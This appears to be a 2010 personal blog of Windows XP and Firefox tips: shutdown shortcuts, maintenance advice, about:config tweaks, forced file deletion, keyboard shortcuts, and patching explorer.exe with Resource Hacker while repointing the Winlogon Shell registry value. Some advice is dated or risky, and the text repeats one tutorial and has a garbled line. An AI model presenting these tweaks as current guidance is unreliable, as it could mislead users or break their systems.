Double-clicking on that shortcut will reboot your PC after a one-second delay and display the message "Rebooting your PC." The shutdown command includes a variety of switches you can use to customize it. Table 1-3 lists all of them and describes their use.

I use this technique to create two shutdown shortcuts on my desktop—one for turning off my PC, and one for rebooting. Here are the ones I use:

shutdown -s -t 03 -c "Bye Bye m8!"

shutdown -r -t 03 -c "Ill be back m8 ;)!"

Switch

What it does
-s

Shuts down the PC.

-l

Logs off the current user.

-t nn

Indicates the duration of delay, in seconds, before performing the action.

-c "messagetext"

Displays a message in the System Shutdown window. A maximum of 127 characters can be used. The message must be enclosed in quotation marks.

-f

Forces any running applications to shut down.
-r

Reboots the PC.

Computer Maintenance

You may not realize it, but your computer and your car have something in common: they both need regular maintenance. No, you don't need to change your computer's oil. But you should be updating your software, keeping your antivirus subscription up to date, and checking for spyware. Read on to learn what you can do to help improve your computer's security.

Getting started
Here are some basics maintenance tasks you can do today to start improving your computer's security. Be sure you make these part of your ongoing maintenance as well.

* Sign up for software update e-mail notices. Many software companies will send you e-mail whenever a software update is available. This is particularly important for your operating system (e.g., Microsoft VV!
VD0VV$® or Macintosh), your antivirus program, and your firewall.

* Register your software. If you still have registration forms for existing software, send them in. And be sure to register new software in the future. This is another way for the software manufacturer to alert you when new updates are available.

* Install software updates immediately.

When you get an update notice, download the update immediately and install it. (Remember, downloading and installing are two separate tasks.)

Anounce of prevention

A few simple steps will help you keep your files safe and clean.

* Step 1: Update your software

* Step 2: Backup your files

* Step 3: Use antivirus software and keep it updated

* Step 4: Change your passwords

Developing ongoing maintenance practices

Now that you've done some ground work, it's time to start moving into longer term maintenance tasks. These are all tasks that you should do today (or as soon as possible) to get started. But for best results, make these a part of a regular maintenance schedule. We recommend setting aside time each week to help keep your computer secure.

* Back up your files. Backing up your files simply means creating a copy of your computer files that you can use in the event the originals are lost. (Accidents can happen.) To learn more read our tips for backing up information.

* Scan your files with up to date antivirus software. Use your antivirus scan tool regularly to search for potential computer viruses and worms. Also, check your antivirus program's user manual to see if you can schedule an automatic scan of your computer. To learn more, read our tips for reducing your virus risk

.* Change your passwords. Using the same password increases the odds that someone else will discover it. Change all of your passwords regularly (we recommend monthly) to reduce your risk. Also, choose your passwords carefully. To learn more, read our tips for creating stronger passwords

Making a schedule
One of the best ways to help protect your computer is to perform maintenance regularly. To help you keep track, we suggest making a regular "appointment" with your computer. Treat it like you would any other appointment. Record it in your datebook or online calendar, and if you cannot make it, reschedule. Remember, you are not only helping to improve your computer, you are also helping to protect your personal information.

Thursday, April 8, 2010

Speed up your Mozilla Firefox

Yes, firefox is already pretty damn fast but did you know that you can tweak it and improve the speed even more?

That's the beauty of this program being open source.
Here's what you do:
In the URL bar, type “about:config” and press enter. This will bring up the configuration “menu” where you can change the parameters of Firefox.

Note that these are what I’ve found to REALLY speed up my Firefox significantly - and these settings seem to be common among everybody else as well. But these settings are optimized for broadband connections - I mean with as much concurrent requests we’re going to open up with pipelining… lol… you’d better have a big connection.

Double Click on the following settins and put in the numbers below - for the true / false booleans - they’ll change when you double click.

Code:
browser.tabs.showSingleWindowModePrefs – true
network.http.max-connections – 48
network.http.max-connections-per-server – 16
network.http.max-persistent-connections-per-proxy – 8
network.http.max-persistent-connections-per-server – 4
network.http.pipelining – true
network.http.pipelining.maxrequests – 100
network.http.proxy.pipelining – true
network.http.request.timeout – 300


One more thing… Right-click somewhere on that screen and add a NEW -> Integer. Name it “nglayout.initialpaint.delay” and set its value to “0”. This value is the amount of time the browser waits before it acts on information it receives. Since you’re broadband - it shouldn’t have to wait.

Now you should notice you’re loading pages MUCH faster now!

Delete undeletable files

Delete An "undeletable" File

Open a Command Prompt window and leave it open.
Close all open programs.
Click Start, Run and enter TASKMGR.EXE
Go to the Processes tab and End Process on Explorer.exe.
Leave Task Manager open.
Go back to the Command Prompt window and change to the directory the AVI (or other undeletable file) is located in.
At the command prompt type DEL where is the file you wish to delete.
Go back to Task Manager, click File, New Task and enter EXPLORER.EXE to restart the GUI shell.
Close Task Manager.


Or you can try this

Open Notepad.exe

Click File>Save As..>

locate the folder where ur undeletable file is

Choose 'All files' from the file type box

click once on the file u wanna delete so its name appears in the 'filename' box

put a " at the start and end of the filename
(the filename should have the extension of the undeletable file so it will overwrite it)

click save,

It should ask u to overwrite the existing file, choose yes and u can delete it as normal


Here's a manual way of doing it. I'll take this off once you put into your first post zain.

1. Start
2. Run
3. Type: command
4. To move into a directory type: cd c:\*** (The stars stand for your folder)
5. If you cannot access the folder because it has spaces for example Program Files or Kazaa Lite folder you have to do the following. instead of typing in the full folder name only take the first 6 letters then put a ~ and then 1 without spaces. Example: cd c:\progra~1\kazaal~1
6. Once your in the folder the non-deletable file it in type in dir - a list will come up with everything inside.
7. Now to delete the file type in del ***.bmp, txt, jpg, avi, etc... And if the file name has spaces you would use the special 1st 6 letters followed by a ~ and a 1 rule. Example: if your file name was bad file.bmp you would type once in the specific folder thorugh command, del badfil~1.bmp and your file should be gone. Make sure to type in the correct extension.

Place your name on XP start button

Step 1 - Modify Explorer.exe File

In order to make the changes, the file explorer.exe located at C:\Windows needs to be edited. Since explorer.exe is a binary file it requires a special editor. For purposes of this article I have used Resource Hacker. Resource HackerTM is a freeware utility to view, modify, rename, add, delete and extract resources in 32bit Windows executables and resource files (*.res). It incorporates an internal resource script compiler and decompiler and works on Microsoft Windows 95/98/ME, Windows NT, Windows 2000 and Windows XP operating systems.

get this from h**p://delphi.icm.edu.pl/ftp/tools/ResHack.zip

The first step is to make a backup copy of the file explorer.exe located at C:\Windows\explorer. Place it in a folder somewhere on your hard drive where it will be safe. Start Resource Hacker and open explorer.exe located at C:\Windows\explorer.exe.

The category we are going to be using is "String Table". Expand it by clicking the plus sign then navigate down to and expand string 37 followed by highlighting 1033. If you are using the Classic Layout rather than the XP Layout, use number 38. The right hand pane will display the stringtable. We’re going to modify item 578, currently showing the word “start” just as it displays on the current Start button.

There is no magic here. Just double click on the word “start” so that it’s highlighted, making sure the quotation marks are not part of the highlight. They need to remain in place, surrounding the new text that you’ll type. Go ahead and type your new entry. In my case I used Click Me!

You’ll notice that after the new text string has been entered the Compile Script button that was grayed out is now active. I won’t get into what’s involved in compiling a script, but suffice it to say it’s going to make this exercise worthwhile. Click Compile Script and then save the altered file using the Save As command on the File Menu. Do not use the Save command – Make sure to use the Save As command and choose a name for the file. Save the newly named file to C:\Windows.


Step 2 – Modify the Registry

!!!make a backup of your registry before making changes!!!

Now that the modified explorer.exe has been created it’s necessary to modify the registry so the file will be recognized when the user logs on to the system. If you don’t know how to access the registry I’m not sure this article is for you, but just in case it’s a temporary memory lapse, go to Start (soon to be something else) Run and type regedit in the Open field. Navigate to:

HKEY_LOCAL_MACHINE\ SOFTWARE\ Microsoft\ Windows NT\ CurrentVersion\ Winlogon

In the right pane, double click the "Shell" entry to open the Edit String dialog box. In Value data: line, enter the name that was used to save the modified explorer.exe file. Click OK.

Close Registry Editor and either log off the system and log back in, or reboot the entire system if that’s your preference. If all went as planned you should see your new Start button with the revised text.[/b]

Monday, April 5, 2010

Change text on XP start Button

Step 1 - Modify Explorer.exe File

In order to make the changes, the file explorer.exe located at C:\Windows needs to be edited. Since explorer.exe is a binary file it requires a special editor. For purposes of this article I have used Resource Hacker. Resource HackerTM is a freeware utility to view, modify, rename, add, delete and extract resources in 32bit Windows executables and resource files (*.res). It incorporates an internal resource script compiler and decompiler and works on Microsoft Windows 95/98/ME, Windows NT, Windows 2000 and Windows XP operating systems.

get this from h**p://delphi.icm.edu.pl/ftp/tools/ResHack.zip

The first step is to make a backup copy of the file explorer.exe located at C:\Windows\explorer. Place it in a folder somewhere on your hard drive where it will be safe. Start Resource Hacker and open explorer.exe located at C:\Windows\explorer.exe.

The category we are going to be using is "String Table". Expand it by clicking the plus sign then navigate down to and expand string 37 followed by highlighting 1033. If you are using the Classic Layout rather than the XP Layout, use number 38. The right hand pane will display the stringtable. We’re going to modify item 578, currently showing the word “start” just as it displays on the current Start button.

There is no magic here. Just double click on the word “start” so that it’s highlighted, making sure the quotation marks are not part of the highlight. They need to remain in place, surrounding the new text that you’ll type. Go ahead and type your new entry. In my case I used Click Me!

You’ll notice that after the new text string has been entered the Compile Script button that was grayed out is now active. I won’t get into what’s involved in compiling a script, but suffice it to say it’s going to make this exercise worthwhile. Click Compile Script and then save the altered file using the Save As command on the File Menu. Do not use the Save command – Make sure to use the Save As command and choose a name for the file. Save the newly named file to C:\Windows.


Step 2 – Modify the Registry

!!!make a backup of your registry before making changes!!!

Now that the modified explorer.exe has been created it’s necessary to modify the registry so the file will be recognized when the user logs on to the system. If you don’t know how to access the registry I’m not sure this article is for you, but just in case it’s a temporary memory lapse, go to Start (soon to be something else) Run and type regedit in the Open field. Navigate to:

HKEY_LOCAL_MACHINE\ SOFTWARE\ Microsoft\ Windows NT\ CurrentVersion\ Winlogon

In the right pane, double click the "Shell" entry to open the Edit String dialog box. In Value data: line, enter the name that was used to save the modified explorer.exe file. Click OK.

Close Registry Editor and either log off the system and log back in, or reboot the entire system if that’s your preference. If all went as planned you should see your new Start button with the revised text.[/b]

Keyboard Shortcuts

Here friends i have given some very useful shortcut:
Windows key + R = Run menu

This is usually followed by:
cmd = Command Prompt
iexplore + "web address" = Internet Explorer
compmgmt.msc = Computer Management
dhcpmgmt.msc = DHCP Management
dnsmgmt.msc = DNS Management
services.msc = Services
eventvwr = Event Viewer
dsa.msc = Active Directory Users and Computers
dssite.msc = Active Directory Sites and Services
Windows key + E = Explorer

ALT + Tab = Switch between windows

ALT, Space, X = Maximize window

CTRL + Shift + Esc = Task Manager

Windows key + Break = System properties

Windows key + F = Search

Windows key + D = Hide/Display all windows

CTRL + C = copy

CTRL + X = cut

CTRL + V = paste

Also don't forget about the "Right-click" key next to the right Windows key on your keyboard. Using the arrows and that key can get just about anything done once you've opened up any program.


Keyboard Shortcuts

[Alt] and [Esc] Switch between running applications

[Alt] and letter Select menu item by underlined letter

[Ctrl] and [Esc] Open Program Menu

[Ctrl] and [F4] Close active document or group windows (does not work with some applications)

[Alt] and [F4] Quit active application or close current window

[Alt] and [-] Open Control menu for active document

Ctrl] Lft., Rt. arrow Move cursor forward or back one word

Ctrl] Up, Down arrow Move cursor forward or back one paragraph

[F1] Open Help for active application

Windows+M Minimize all open windows

Shift+Windows+M Undo minimize all open windows

Windows+F1 Open Windows Help

Windows+Tab Cycle through the Taskbar buttons

Windows+Break Open the System Properties dialog box



acessability shortcuts

Right SHIFT for eight seconds........ Switch FilterKeys on and off.

Left ALT +left SHIFT +PRINT SCREEN....... Switch High Contrast on and off.

Left ALT +left SHIFT +NUM LOCK....... Switch MouseKeys on and off.

SHIFT....... five times Switch StickyKeys on and off.

NUM LOCK...... for five seconds Switch ToggleKeys on and off.

explorer shortcuts

END....... Display the bottom of the active window.

HOME....... Display the top of the active window.

NUM LOCK+ASTERISK....... on numeric keypad (*) Display all subfolders under the selected folder.

NUM LOCK+PLUS SIGN....... on numeric keypad (+) Display the contents of the selected folder.

NUM LOCK+MINUS SIGN....... on numeric keypad (-) Collapse the selected folder.

LEFT ARROW...... Collapse current selection if it's expanded, or select parent folder.

RIGHT ARROW....... Display current selection if it's collapsed, or select first subfolder.